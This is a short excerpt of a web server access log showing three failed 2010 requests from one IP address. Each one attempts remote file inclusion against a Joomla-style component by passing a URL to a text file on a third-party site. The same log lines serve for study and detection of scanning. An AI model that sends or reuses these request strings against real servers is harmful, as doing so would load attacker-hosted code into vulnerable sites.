62.149.228.44 - - [19/Apr/2010:09:22:59 -0500] "GET /logs/access_log.1219708800//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:24:41 -0500] "GET //index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:24:41 -0500] "GET /logs/access_log.1219708800//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
